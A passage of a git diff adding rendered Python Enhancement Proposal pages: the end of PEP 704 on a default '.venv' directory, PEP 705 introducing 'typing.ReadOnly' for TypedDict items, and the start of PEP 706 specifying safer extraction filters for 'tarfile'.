    +
  1. It makes it easier for users to find the virtual environment directory, and to activate it.
  2. +
  3. It removes a decision point for new users, since they do not need to decide on a name for the virtual environment directory.
  4. +
  5. It creates a clear convention within the ecosystem, which makes it easier for users to find documentation.
  6. +
  7. It ensures consistency across different tools, so that differences in the error messages do not confuse users.
  8. +
+
+
+

Use a different name for the virtual environment directory

+

Functionally, the directory name does not matter much as long as there is a single consistent suggestion.

+

The name .venv was picked since it:

+
    +
  1. does not conflict with any valid Python import name
  2. +
  3. does not conflict venv module in the standard library
  4. +
  5. has pre-existing usage in the Python community
  6. +
  7. has support for auto-detection in common text editors
  8. +
  9. can be typed without modifier keys on common keyboard layouts
  10. +
+
+
+

Do not couple tooling behaviour with a Python version

+

This PEP creates a coupling between the behaviour of installers and the Python version.

+

This is already a rollout mechanism being used for behaviour changes in the installation tooling. For example, pip on Python 3.11 will use importlib.metadata instead of pkg_resources for parsing/fetching package metadata, and sysconfig instead of distutils.sysconfig for getting the paths to unpack wheels into.

+

The difference with those cases is that they’re supposed to be largely transparent to end users. This PEP is proposing a behaviour change that is not transparent to end users, and requires them to take action.

+

The primary benefit of this is that it allows for redistributors to adapt their tooling in time for the new Python version and provides a clear and consistent point for change across the ecosystem. It also puts a clear deadline on when the default behaviour will consistently require a virtual environment by default (once Python 3.12 goes end-of-life).

+

The primary issue with this approach is that it enforces a behaviour change on users when they upgrade to a new Python version, which can hamper the adoption of a new Python version. However, this is a migration/upgrade for existing users and it is a common expectation that some changes will be needed for migration/upgrades.

+

The author of this PEP believes that the benefits of applying this consistently throughout the ecosystem with a deadline outweigh the drawbacks of enforcing a best-practice on users when they upgrade.

+
+
+
+

Open Issues

+

None.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0704.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0705/index.html b/pep-0705/index.html new file mode 100644 index 00000000000..c6245ab7a84 --- /dev/null +++ b/pep-0705/index.html @@ -0,0 +1,731 @@ + + + + + + + + PEP 705 – TypedDict: Read-only items | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 705 – TypedDict: Read-only items

+
+
Author:
+
Alice Purcell <alicederyn at gmail.com>
+
Sponsor:
+
Pablo Galindo <pablogsal at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
07-Nov-2022
+
Python-Version:
+
3.13
+
Post-History:
+
30-Sep-2022, +02-Nov-2022, +14-Mar-2023, +17-Oct-2023, +04-Nov-2023
+
Resolution:
+
29-Feb-2024
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see typing.ReadOnly type qualifier and +typing.ReadOnly for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+

×

+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

PEP 589 defines the structural type TypedDict for dictionaries with a fixed set of keys. +As TypedDict is a mutable type, it is difficult to correctly annotate methods which accept read-only parameters in a way that doesn’t prevent valid inputs.

+

This PEP proposes a new type qualifier, typing.ReadOnly, to support these usages. It makes no Python grammar changes. Correct usage of read-only keys of TypedDicts is intended to be enforced only by static type checkers, and will not be enforced by Python itself at runtime.

+
+
+

Motivation

+

Representing structured data using (potentially nested) dictionaries with string keys is a common pattern in Python programs. PEP 589 allows these values to be type checked when the exact type is known up-front, but it is hard to write read-only code that accepts more specific variants: for instance, where values may be subtypes or restrict a union of possible types. This is an especially common issue when writing APIs for services, which may support a wide range of input structures, and typically do not need to modify their input.

+
+

Pure functions

+

Consider trying to add type hints to a function movie_string:

+
def movie_string(movie: Movie) -> str:
+    if movie.get("year") is None:
+        return movie["name"]
+    else:
+        return f'{movie["name"]} ({movie["year"]})'
+
+
+

We could define this Movie type using a TypedDict:

+
from typing import NotRequired, TypedDict
+
+class Movie(TypedDict):
+    name: str
+    year: NotRequired[int | None]
+
+
+

But suppose we have another type where year is required:

+
class MovieRecord(TypedDict):
+    name: str
+    year: int
+
+
+

Attempting to pass a MovieRecord into movie_string results in the error (using mypy):

+
Argument 1 to "movie_string" has incompatible type "MovieRecord"; expected "Movie"
+
+
+

This particular use case should be type-safe, but the type checker correctly stops the +user from passing a MovieRecord into a Movie parameter in the general case, because +the Movie class has mutator methods that could potentially allow the function to break +the type constraints in MovieRecord (e.g. with movie["year"] = None or del movie["year"]). +The problem disappears if we don’t have mutator methods in Movie. This could be achieved by defining an immutable interface using a PEP 544 Protocol:

+
from typing import Literal, Protocol, overload
+
+class Movie(Protocol):
+    @overload
+    def get(self, key: Literal["name"]) -> str: ...
+
+    @overload
+    def get(self, key: Literal["year"]) -> int | None: ...
+
+    @overload
+    def __getitem__(self, key: Literal["name"]) -> str: ...
+
+    @overload
+    def __getitem__(self, key: Literal["year"]) -> int | None: ...
+
+
+

This is very repetitive, easy to get wrong, and is still missing important method definitions like __contains__() and keys().

+
+
+

Updating nested dicts

+

The structural typing of TypedDict is supposed to permit writing update functions that only constrain the types of items they modify:

+
class HasTimestamp(TypedDict):
+    timestamp: float
+
+class Logs(TypedDict):
+    timestamp: float
+    loglines: list[str]
+
+def update_timestamp(d: HasTimestamp) -> None:
+    d["timestamp"] = now()
+
+def add_logline(logs: Logs, logline: str) -> None:
+    logs["loglines"].append(logline)
+    update_timestamp(logs)  # Accepted by type checker
+
+
+

However, this no longer works once you start nesting dictionaries:

+
class HasTimestampedMetadata(TypedDict):
+    metadata: HasTimestamp
+
+class UserAudit(TypedDict):
+    name: str
+    metadata: Logs
+
+def update_metadata_timestamp(d: HasTimestampedMetadata) -> None:
+    d["metadata"]["timestamp"] = now()
+
+def rename_user(d: UserAudit, name: str) -> None:
+    d["name"] = name
+    update_metadata_timestamp(d)  # Type check error: "metadata" is not of type HasTimestamp
+
+
+

This looks like an error, but is simply due to the (unwanted) ability to overwrite the metadata item held by the HasTimestampedMetadata instance with a different HasTimestamp instance, that may no longer be a Logs instance.

+

It is possible to work around this issue with generics (as of Python 3.11), but it is very complicated, requiring a type parameter for every nested dict.

+
+
+
+

Rationale

+

These problems can be resolved by removing the ability to update one or more of the items in a TypedDict. This does not mean the items are immutable: a reference to the underlying dictionary could still exist with a different but compatible type in which those items have mutator operations. These items are “read-only”, and we introduce a new typing.ReadOnly type qualifier for this purpose.

+

The movie_string function in the first motivating example can then be typed as follows:

+
from typing import NotRequired, ReadOnly, TypedDict
+
+class Movie(TypedDict):
+    name: ReadOnly[str]
+    year: ReadOnly[NotRequired[int | None]]
+
+def movie_string(movie: Movie) -> str:
+    if movie.get("year") is None:
+        return movie["name"]
+    else:
+        return f'{movie["name"]} ({movie["year"]})'
+
+
+

A mixture of read-only and non-read-only items is permitted, allowing the second motivating example to be correctly annotated:

+
class HasTimestamp(TypedDict):
+    timestamp: float
+
+class HasTimestampedMetadata(TypedDict):
+    metadata: ReadOnly[HasTimestamp]
+
+def update_metadata_timestamp(d: HasTimestampedMetadata) -> None:
+    d["metadata"]["timestamp"] = now()
+
+class Logs(HasTimestamp):
+    loglines: list[str]
+
+class UserAudit(TypedDict):
+    name: str
+    metadata: Logs
+
+def rename_user(d: UserAudit, name: str) -> None:
+    d["name"] = name
+    update_metadata_timestamp(d)  # Now OK
+
+
+

In addition to these benefits, by flagging arguments of a function as read-only (by using a TypedDict like Movie with read-only items), it makes explicit not just to typecheckers but also to users that the function is not going to modify its inputs, which is usually a desirable property of a function interface.

+

This PEP proposes making ReadOnly valid only in a TypedDict. A possible future extension would be to support it in additional contexts, such as in protocols.

+
+
+

Specification

+

A new typing.ReadOnly type qualifier is added.

+
+

typing.ReadOnly type qualifier

+

The typing.ReadOnly type qualifier is used to indicate that an item declared in a TypedDict definition may not be mutated (added, modified, or removed):

+
from typing import ReadOnly
+
+class Band(TypedDict):
+    name: str
+    members: ReadOnly[list[str]]
+
+blur: Band = {"name": "blur", "members": []}
+blur["name"] = "Blur"  # OK: "name" is not read-only
+blur["members"] = ["Damon Albarn"]  # Type check error: "members" is read-only
+blur["members"].append("Damon Albarn")  # OK: list is mutable
+
+
+
+
+

Alternative functional syntax

+

The alternative functional syntax for TypedDict also supports the new type qualifier:

+
Band = TypedDict("Band", {"name": str, "members": ReadOnly[list[str]]})
+
+
+
+
+

Interaction with other special types

+

ReadOnly[] can be used with Required[], NotRequired[] and Annotated[], in any nesting order:

+
class Movie(TypedDict):
+    title: ReadOnly[Required[str]]  # OK
+    year: ReadOnly[NotRequired[Annotated[int, ValueRange(-9999, 9999)]]]  # OK
+
+
+
class Movie(TypedDict):
+    title: Required[ReadOnly[str]]  # OK
+    year: Annotated[NotRequired[ReadOnly[int]], ValueRange(-9999, 9999)]  # OK
+
+
+

This is consistent with the behavior introduced in PEP 655.

+
+
+

Inheritance

+

Subclasses can redeclare read-only items as non-read-only, allowing them to be mutated:

+
class NamedDict(TypedDict):
+    name: ReadOnly[str]
+
+class Album(NamedDict):
+    name: str
+    year: int
+
+album: Album = { "name": "Flood", "year": 1990 }
+album["year"] = 1973
+album["name"] = "Dark Side Of The Moon"  # OK: "name" is not read-only in Album
+
+
+

If a read-only item is not redeclared, it remains read-only:

+
class Album(NamedDict):
+    year: int
+
+album: Album = { "name": "Flood", "year": 1990 }
+album["name"] = "Dark Side Of The Moon"  # Type check error: "name" is read-only in Album
+
+
+

Subclasses can narrow value types of read-only items:

+
class AlbumCollection(TypedDict):
+    albums: ReadOnly[Collection[Album]]
+
+class RecordShop(AlbumCollection):
+    name: str
+    albums: ReadOnly[list[Album]]  # OK: "albums" is read-only in AlbumCollection
+
+
+

Subclasses can require items that are read-only but not required in the superclass:

+
class OptionalName(TypedDict):
+    name: ReadOnly[NotRequired[str]]
+
+class RequiredName(OptionalName):
+    name: ReadOnly[Required[str]]
+
+d: RequiredName = {}  # Type check error: "name" required
+
+
+

Subclasses can combine these rules:

+
class OptionalIdent(TypedDict):
+    ident: ReadOnly[NotRequired[str | int]]
+
+class User(OptionalIdent):
+    ident: str  # Required, mutable, and not an int
+
+
+

Note that these are just consequences of structural typing, but they are highlighted here as the behavior now differs from the rules specified in PEP 589.

+
+
+

Type consistency

+

This section updates the type consistency rules introduced in PEP 589 to cover the new feature in this PEP. In particular, any pair of types that do not use the new feature will be consistent under these new rules if (and only if) they were already consistent.

+

A TypedDict type A is consistent with TypedDict B if A is structurally compatible with B. This is true if and only if all of the following are satisfied:

+
    +
  • For each item in B, A has the corresponding key, unless the item in B is read-only, not required, and of top value type (ReadOnly[NotRequired[object]]).
  • +
  • For each item in B, if A has the corresponding key, the corresponding value type in A is consistent with the value type in B.
  • +
  • For each non-read-only item in B, its value type is consistent with the corresponding value type in A.
  • +
  • For each required key in B, the corresponding key is required in A.
  • +
  • For each non-required key in B, if the item is not read-only in B, the corresponding key is not required in A.
  • +
+

Discussion:

+
    +
  • All non-specified items in a TypedDict implicitly have value type ReadOnly[NotRequired[object]].
  • +
  • Read-only items behave covariantly, as they cannot be mutated. This is similar to container types such as Sequence, and different from non-read-only items, which behave invariantly. Example:
    class A(TypedDict):
    +    x: ReadOnly[int | None]
    +
    +class B(TypedDict):
    +    x: int
    +
    +def f(a: A) -> None:
    +    print(a["x"] or 0)
    +
    +b: B = {"x": 1}
    +f(b)  # Accepted by type checker
    +
    +
    +
  • +
  • A TypedDict type A with no explicit key 'x' is not consistent with a TypedDict type B with a non-required key 'x', since at runtime the key 'x' could be present and have an incompatible type (which may not be visible through A due to structural subtyping). The only exception to this rule is if the item in B is read-only, and the value type is of top type (object). For example:
    class A(TypedDict):
    +    x: int
    +
    +class B(TypedDict):
    +    x: int
    +    y: ReadOnly[NotRequired[object]]
    +
    +a: A = { "x": 1 }
    +b: B = a  # Accepted by type checker
    +
    +
    +
  • +
+
+
+

Update method

+

In addition to existing type checking rules, type checkers should error if a TypedDict with a read-only item is updated with another TypedDict that declares that key:

+
class A(TypedDict):
+    x: ReadOnly[int]
+    y: int
+
+a1: A = { "x": 1, "y": 2 }
+a2: A = { "x": 3, "y": 4 }
+a1.update(a2)  # Type check error: "x" is read-only in A
+
+
+

Unless the declared value is of bottom type (Never):

+
class B(TypedDict):
+    x: NotRequired[typing.Never]
+    y: ReadOnly[int]
+
+def update_a(a: A, b: B) -> None:
+    a.update(b)  # Accepted by type checker: "x" cannot be set on b
+
+
+

Note: Nothing will ever match the Never type, so an item annotated with it must be absent.

+
+
+

Keyword argument typing

+

PEP 692 introduced Unpack to annotate **kwargs with a TypedDict. Marking one or more of the items of a TypedDict used in this way as read-only will have no effect on the type signature of the method. However, it will prevent the item from being modified in the body of the function:

+
class Args(TypedDict):
+    key1: int
+    key2: str
+
+class ReadOnlyArgs(TypedDict):
+    key1: ReadOnly[int]
+    key2: ReadOnly[str]
+
+class Function(Protocol):
+    def __call__(self, **kwargs: Unpack[Args]) -> None: ...
+
+def impl(**kwargs: Unpack[ReadOnlyArgs]) -> None:
+    kwargs["key1"] = 3  # Type check error: key1 is readonly
+
+fn: Function = impl  # Accepted by type checker: function signatures are identical
+
+
+
+
+

Runtime behavior

+

TypedDict types will gain two new attributes, __readonly_keys__ and __mutable_keys__, which will be frozensets containing all read-only and non-read-only keys, respectively:

+
class Example(TypedDict):
+    a: int
+    b: ReadOnly[int]
+    c: int
+    d: ReadOnly[int]
+
+assert Example.__readonly_keys__ == frozenset({'b', 'd'})
+assert Example.__mutable_keys__ == frozenset({'a', 'c'})
+
+
+

typing.get_type_hints will strip out any ReadOnly type qualifiers, unless include_extras is True:

+
assert get_type_hints(Example)['b'] == int
+assert get_type_hints(Example, include_extras=True)['b'] == ReadOnly[int]
+
+
+

typing.get_origin and typing.get_args will be updated to recognize ReadOnly:

+
assert get_origin(ReadOnly[int]) is ReadOnly
+assert get_args(ReadOnly[int]) == (int,)
+
+
+
+
+
+

Backwards compatibility

+

This PEP adds a new feature to TypedDict, so code that inspects TypedDict types will have to change to support types using it. This is expected to mainly affect type-checkers.

+
+
+

Security implications

+

There are no known security consequences arising from this PEP.

+
+
+

How to teach this

+

Suggested changes to the typing module documentation, in line with current practice:

+
    +
  • Add this PEP to the others listed.
  • +
  • Add typing.ReadOnly, linked to TypedDict and this PEP.
  • +
  • Add the following text to the TypedDict entry:
  • +
+

The ReadOnly type qualifier indicates that an item declared in a TypedDict definition may be read but not mutated (added, modified or removed). This is useful when the exact type of the value is not known yet, and so modifying it would break structural subtypes. insert example

+
+
+

Reference implementation

+

pyright 1.1.333 fully implements this proposal.

+
+
+

Rejected alternatives

+
+

A TypedMapping protocol type

+

An earlier version of this PEP proposed a TypedMapping protocol type, behaving much like a read-only TypedDict but without the constraint that the runtime type be a dict. The behavior described in the current version of this PEP could then be obtained by inheriting a TypedDict from a TypedMapping. This has been set aside for now as more complex, without a strong use-case motivating the additional complexity.

+
+
+

A higher-order ReadOnly type

+

A generalized higher-order type could be added that removes mutator methods from its parameter, e.g. ReadOnly[MovieRecord]. For a TypedDict, this would be like adding ReadOnly to every item, including those declared in superclasses. This would naturally want to be defined for a wider set of types than just TypedDict subclasses, and also raises questions about whether and how it applies to nested types. We decided to keep the scope of this PEP narrower.

+
+
+

Calling the type Readonly

+

Read-only is generally hyphenated, and it appears to be common convention to put initial caps onto words separated by a dash when converting to CamelCase. This appears consistent with the definition of CamelCase on Wikipedia: CamelCase uppercases the first letter of each word. That said, Python examples or counter-examples, ideally from the core Python libraries, or better explicit guidance on the convention, would be greatly appreciated.

+
+
+

Reusing the Final annotation

+

The Final annotation prevents an attribute from being modified, like the proposed ReadOnly qualifier does for TypedDict items. However, it is also documented as preventing redefinition in subclasses too; from PEP 591:

+
+
The typing.Final type qualifier is used to indicate that a variable or attribute should not be reassigned, redefined, or overridden.
+

This does not fit with the intended use of ReadOnly. Rather than introduce confusion by having Final behave differently in different contexts, we chose to introduce a new qualifier.

+
+
+

A readonly flag

+

Earlier versions of this PEP introduced a boolean flag that would ensure all items in a TypedDict were read-only:

+
class Movie(TypedDict, readonly=True):
+    name: str
+    year: NotRequired[int | None]
+
+movie: Movie = { "name": "A Clockwork Orange" }
+movie["year"] = 1971  # Type check error: "year" is read-only
+
+
+

However, this led to confusion when inheritance was introduced:

+
class A(TypedDict):
+    key1: int
+
+class B(A, TypedDict, readonly=True):
+    key2: int
+
+b: B = { "key1": 1, "key2": 2 }
+b["key1"] = 4  # Accepted by type checker: "key1" is not read-only
+
+
+

It would be reasonable for someone familiar with frozen (from dataclasses), on seeing just the definition of B, to assume that the whole type was read-only. On the other hand, it would be reasonable for someone familiar with total to assume that read-only only applies to the current type.

+

The original proposal attempted to eliminate this ambiguity by making it both a type check and a runtime error to define B in this way. This was still a source of surprise to people expecting it to work like total.

+

Given that no extra types could be expressed with the readonly flag, it has been removed from the proposal to avoid ambiguity and surprise.

+
+
+

Supporting type-checked removal of read-only qualifier via copy and other methods

+

An earlier version of this PEP mandated that code like the following be supported by type-checkers:

+
class A(TypedDict):
+    x: ReadOnly[int]
+
+class B(TypedDict):
+    x: ReadOnly[str]
+
+class C(TypedDict):
+    x: int | str
+
+def copy_and_modify(a: A) -> C:
+    c: C = copy.copy(a)
+    if not c['x']:
+        c['x'] = "N/A"
+    return c
+
+def merge_and_modify(a: A, b: B) -> C:
+    c: C = a | b
+    if not c['x']:
+        c['x'] = "N/A"
+    return c
+
+
+

However, there is currently no way to express this in the typeshed, meaning type-checkers would be forced to special-case these functions. There is already a way to code these operations that mypy and pyright do support, though arguably this is less readable:

+
copied: C = { **a }
+merged: C = { **a, **b }
+
+
+

While not as flexible as would be ideal, the current typeshed stubs are sound, and remain so if this PEP is accepted. Updating the typeshed would require new typing features, like a type constructor to express the type resulting from merging two or more dicts, and a type qualifier to indicate a returned value is not shared (so may have type constraints like read-only and invariance of generics loosened in specific ways), plus details of how type-checkers would be expected to interpret these features. These could be valuable additions to the language, but are outside the scope of this PEP.

+

Given this, we have deferred any update of the typeshed stubs.

+
+
+

Preventing unspecified keys in TypedDicts

+

Consider the following “type discrimination” code:

+
class A(TypedDict):
+  foo: int
+
+class B(TypedDict):
+  bar: int
+
+def get_field(d: A | B) -> int:
+  if "foo" in d:
+    return d["foo"]  # !!!
+  else:
+    return d["bar"]
+
+
+

This is a common idiom, and other languages like Typescript allow it. Technically, however, this code is unsound: B does not declare foo, but instances of B may still have the key present, and the associated value may be of any type:

+
class C(TypedDict):
+  foo: str
+  bar: int
+
+c: C = { "foo": "hi", "bar" 3 }
+b: B = c  # OK: C is structurally compatible with B
+v = get_field(b)  # Returns a string at runtime, not an int!
+
+
+

mypy rejects the definition of get_field on the marked line with the error TypedDict "B" has no key "foo", which is a rather confusing error message, but is caused by this unsoundness.

+

One option for correcting this would be to explicitly prevent B from holding a foo:

+
class B(TypedDict):
+  foo: NotRequired[Never]
+  bar: int
+
+b: B = c  # Type check error: key "foo" not allowed in B
+
+
+

However, this requires every possible key that might be used to discriminate on to be explicitly declared in every type, which is not generally feasible. A better option would be to have a way of preventing all unspecified keys from being included in B. mypy supports this using the @final decorator from PEP 591:

+
@final
+class B(TypedDict):
+  bar: int
+
+
+

The reasoning here is that this prevents C or any other type from being considered a “subclass” of B, so instances of B can now be relied on to never hold the key foo, even though it is not explicitly declared to be of bottom type.

+

With the introduction of read-only items, however, this reasoning would imply type-checkers should ban the following:

+
@final
+class D(TypedDict):
+  field: ReadOnly[Collection[str]]
+
+@final
+class E(TypedDict):
+  field: list[str]
+
+e: E = { "field": ["value1", "value2"] }
+d: D = e  # Error?
+
+
+

The conceptual problem here is that TypedDicts are structural types: they cannot really be subclassed. As such, using @final on them is not well-defined; it is certainly not mentioned in PEP 591.

+

An earlier version of this PEP proposed resolving this by adding a new flag to TypedDict that would explicitly prevent other keys from being used, but not other kinds of structural compatibility:

+
class B(TypedDict, other_keys=Never):
+  bar: int
+
+b: B = c  # Type check error: key "foo" not allowed in B
+
+
+

However, during the process of drafting, the situation changed:

+ +

As such, there is less urgency to address this issue in this PEP, and it has been deferred to PEP-728.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0705.rst

+

Last modified: 2024-10-17 12:49:39 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0706/index.html b/pep-0706/index.html new file mode 100644 index 00000000000..ffe39b86fda --- /dev/null +++ b/pep-0706/index.html @@ -0,0 +1,791 @@ + + + + + + + + PEP 706 – Filter for tarfile.extractall | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 706 – Filter for tarfile.extractall

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
09-Feb-2023
+
Python-Version:
+
3.12
+
Post-History:
+
25-Jan-2023, +15-Feb-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at tarfile documentation.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

The extraction methods in tarfile gain a filter argument, +which allows rejecting files or modifying metadata as the archive is extracted. +Three built-in named filters are provided, aimed at limiting features that +might be surprising or dangerous. +These can be used as-is, or serve as a base for custom filters.

+

After a deprecation period, a strict (but safer) filter will become the default.

+
+
+

Motivation

+

The tar format is used for several use cases, many of which have different +needs. For example:

+
    +
  • A backup of a UNIX workstation should faithfully preserve all kinds of +details like file permissions, symlinks to system configuration, and various +kinds of special files.
  • +
  • When unpacking a data bundle, it’s much more important that the unpacking +will not have unintended consequences – like exposing a password file by +symlinking it to a public place.
  • +
+

To support all its use cases, the tar format has many features. +In many cases, it’s best to ignore or disallow some of them when extracting +an archive.

+

Python allows extracting tar archives using +tarfile.TarFile.extractall(), whose docs warn to +never extract archives from untrusted sources without prior inspection. +However, it’s not clear what kind of inspection should be done. +Indeed, it’s quite tricky to do such an inspection correctly. +As a result, many people don’t bother, or do the check incorrectly, resulting in +security issues such as CVE-2007-4559.

+

Since tarfile was first written, it’s become more +accepted that warnings in documentation are not enough. +Whenever possible, an unsafe operation should be explicitly requested; +potentially dangerous operations should look dangerous. +However, TarFile.extractall looks benign in a code review.

+

Tarfile extraction is also exposed via shutil.unpack_archive(), +which allows the user to not care about the kind of archive they’re +dealing with. +The API is very inviting for extracting archives without prior inspection, +even though the docs again warn against it.

+

It has been argued that Python is not wrong – it behaves exactly as +documented – but that’s beside the point. +Let’s improve the situation rather than assign/avoid blame. +Python and its docs are the best place to improve things.

+
+
+

Rationale

+

How do we improve things? +Unfortunately, we will need to change the defaults, which implies +breaking backwards compatibility. TarFile.extractall +is what people reach for when they need to extract a tarball. +Its default behaviour needs to change.

+

What would be the best behaviour? That depends on the use case. +So, we’ll add several general “policies” to control extraction. +They are based on use cases, and ideally they should have straightforward +security implications:

+
    +
  • Current behavior: trusting the archive. Suitable e.g. as a building block +for libraries that do the check themselves, or extracting an archive you just +made yourself.
  • +
  • Unpacking a UNIX archive: roughly following GNU tar, e.g. stripping +leading / from filenames.
  • +
  • Unpacking a general data archive: the shutil.unpack_archive() +use case, +where it’s not important to preserve details specific to tar or +Unix-like filesystems.
  • +
+

After a deprecation period, the last option – the most limited +but most secure one – will become the default.

+

Even with better general defaults, users should still verify the archives +they extract, and perhaps modify some of the metadata. +Superficially, the following looks like a reasonable way to do this today:

+ +

However, there are some issues with this approach:

+
    +
  • It’s possible to modify TarInfo objects, but the changes to them +affect all subsequent operations on the same TarFile object. +This behavior is fine for most uses, but despite that, it would be very +surprising if TarFile.extractall did this by default.
  • +
  • Calling getmembers can be expensive and it +requires a seekable archive.
  • +
  • When verifying members in advance, it may be necessary to track how each +member would have changed the filesystem, e.g. how symlinks are being set up. +This is hard. We can’t expect users to do it.
  • +
+

To solve these issues we’ll:

+
    +
  • Provide a supported way to “clone” and modify TarInfo objects. +A replace method, similar to dataclasses.replace() +or namedtuple._replace +should do the trick.
  • +
  • Provide a “filter” hook in extractall’s loop that can modify or discard +members before they are processed.
  • +
  • Require that this hook is called just before extracting each member, +so it can scan the current state of the disk. This will greatly simplify +the implementation of policies (both in stdlib and user code), +at the cost of not being able to do a precise “dry run”.
  • +
+

The hook API will be very similar to the existing filter argument +for TarFile.add. +We’ll also name it filter. +(In some cases “policy” would be a more fitting name, +but the API can be used for more than security policies.)

+

The built-in policies/filters described above will be implemented using the +public filter API, so they can be used as building blocks or examples.

+
+

Setting a precedent

+

If and when other libraries for archive extraction, such as zipfile, +gain similar functionality, they should mimic this API as much as it’s +reasonable.

+

To enable this for simple cases, the built-in filters will have string names; +e.g. users can pass filter='data' instead of a specific function that deals +with TarInfo objects.

+

The shutil.unpack_archive() function will get a +filter argument, which it will pass to extractall.

+

Adding function-based API that would work across archive formats is +out of scope of this PEP.

+
+
+

Full disclosure & redistributor info

+

The PEP author works for Red Hat, a redistributor of Python with different +security needs and support periods than CPython in general. +Such redistributors may want to carry vendor patches to:

+
    +
  • Allow configuring the defaults system-wide, and
  • +
  • Change the default as soon as possible, even in older Python versions.
  • +
+

The proposal makes this easy to do, and it allows users to query +the settings.

+
+
+
+

Specification

+
+

Modifying and forgetting member metadata

+

The TarInfo class will gain a new method, +replace(), which will work similarly to dataclasses.replace. +It will return a copy of the TarInfo object with attributes +replaced as specified by keyword-only arguments:

+
    +
  • name
  • +
  • mtime
  • +
  • mode
  • +
  • linkname
  • +
  • uid
  • +
  • gid
  • +
  • uname
  • +
  • gname
  • +
+

Any of these, except name and linkname, will be allowed to be set +to None. +When extract or extractall encounters such a None, it will not +set that piece of metadata. +(If uname or gname is None, it will fall back to uid or gid +as if the name wasn’t found.) +When addfile or tobuf encounters such a None, it will raise a +ValueError. +When list encounters such a None, it will print a placeholder string.

+

The documentation will mention why the method is there: +TarInfo objects retrieved from TarFile.getmembers +are “live”; modifying them directly will affect subsequent unrelated +operations.

+
+
+

Filters

+

TarFile.extract and +TarFile.extractall methods +will grow a filter keyword-only parameter, +which takes a callable that can be called as:

+
filter(/, member: TarInfo, path: str) -> TarInfo|None
+
+
+

where member is the member to be extracted, and path is the path to +where the archive is extracted (i.e., it’ll be the same for every member).

+

When used it will be called on each member as it is extracted, +and extraction will work with the result. +If it returns None, the member will be skipped.

+

The function can also raise an exception. +This can, depending on TarFile.errorlevel, +abort the extraction or cause the member to be skipped.

+
+

Note

+

If extraction is aborted, the archive may be left partially +extracted. It is the user’s responsibility to clean up.

+
+

We will also provide a set of defaults for common use cases. +In addition to a function, the filter argument can be one +of the following strings:

+
    +
  • 'fully_trusted': Current behavior: honor the metadata as is. +Should be used if the user trusts the archive completely, or implements their +own complex verification.
  • +
  • 'tar': Roughly follow defaults of the GNU tar command +(when run as a normal user):
      +
    • Strip leading '/' and os.sep from filenames
    • +
    • Refuse to extract files with absolute paths (after the / stripping +above, e.g. C:/foo on Windows).
    • +
    • Refuse to extract files whose absolute path (after following symlinks) +would end up outside the destination. +(Note that GNU tar instead delays creating some links.)
    • +
    • Clear high mode bits (setuid, setgid, sticky) and group/other write bits +(S_IWGRP|S_IWOTH). +(This is an approximation of GNU tar’s default, which limits the mode +by the current umask setting.)
    • +
    +
  • +
  • 'data': Extract a “data” archive, disallowing common attack vectors +but limiting functionality. +In particular, many features specific to UNIX-style filesystems (or +equivalently, to the tar archive format) are ignored, making this a good +filter for cross-platform archives. +In addition to tar:
      +
    • Refuse to extract links (hard or soft) that link to absolute paths.
    • +
    • Refuse to extract links (hard or soft) which end up linking to a path +outside of the destination. +(On systems that don’t support links, tarfile will, in most cases, +fall back to creating regular files. +This proposal doesn’t change that behaviour.)
    • +
    • Refuse to extract device files (including pipes).
    • +
    • For regular files and hard links: +
    • +
    • For other files (directories), ignore mode entirely (set it to None).
    • +
    • Ignore user and group info (set uid, gid, uname, gname +to None).
    • +
    +
  • +
+

Any other string will cause a ValueError.

+

The corresponding filter functions will be available as +tarfile.fully_trusted_filter(), tarfile.tar_filter(), etc., so +they can be easily used in custom policies.

+

Note that these filters never return None. +Skipping members this way is a feature for user-defined filters.

+
+
+

Defaults and their configuration

+

TarFile will gain a new attribute, +extraction_filter, to allow configuring the default filter. +By default it will be None, but users can set it to a callable +that will be used if the filter argument is missing or None.

+
+

Note

+

String names won’t be accepted here. That would encourage code like +my_tarfile.extraction_filter = 'data'. +On Python versions without this feature, this would do nothing, +silently ignoring a security-related request.

+
+

If both the argument and attribute are None:

+
    +
  • In Python 3.12-3.13, a DeprecationWarning will be emitted and +extraction will use the 'fully_trusted' filter.
  • +
  • In Python 3.14+, it will use the 'data' filter.
  • +
+

Applications and system integrators may wish to change extraction_filter +of the TarFile class itself to set a global default. +When using a function, they will generally want to wrap it in staticmethod() +to prevent injection of a self argument.

+

Subclasses of TarFile can also override extraction_filter.

+
+
+

FilterError

+

A new exception, FilterError, will be added to the tarfile +module. +It’ll have several new subclasses, one for each of the refusal reasons above. +FilterError’s member attribute will contain the relevant TarInfo.

+

In the lists above, “refusing” to extract a file means that a FilterError +will be raised. +As with other extraction errors, if the TarFile.errorlevel +is 1 or more, this will abort the extraction; with errorlevel=0 the error +will be logged and the member will be ignored, but extraction will continue. +Note that extractall() may leave the archive partially extracted; +it is the user’s responsibility to clean up.

+
+
+

Errorlevel, and fatal/non-fatal errors

+

Currently, TarFile has an errorlevel +argument/attribute, which specifies how errors are handled:

+
    +
